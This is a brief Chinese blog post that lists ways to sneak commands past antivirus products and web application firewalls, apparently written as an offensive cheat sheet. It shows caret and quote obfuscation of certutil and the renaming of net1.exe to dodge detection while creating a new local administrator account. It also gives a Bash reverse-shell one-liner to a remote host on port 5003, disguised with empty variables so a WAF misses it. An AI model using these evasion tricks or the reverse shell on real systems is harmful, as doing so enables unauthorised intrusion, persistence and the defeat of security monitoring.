像诗里纷飞的美丽章节.|

园龄:粉丝:关注:

命令执行绕过

命令执行绕过

前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了

1、多空一格

2、^混淆

certutil -url^cache

3、拷贝文件名

copy C:\Windows\System32\certutil.exe xx.exe

之前绕过火绒添加用户案例

copy c:\windows\system32\net1.exe d:\update.exe

d:\update.exe user newuser password123 /add

net localgroup administrators newuser /add

4、修改文件资源绕过360

5、""混淆

ce""""rtu""til -url""""ca""che -spl""""it -f

6、未初始化变量绕过

在Linux中,可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u,它不会报错,而是会返回一个空值。

/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u

本文作者:xiaoxin07

本文链接:https://www.cnblogs.com/xiaoxin07/p/18401610

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   小新07  阅读(49)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起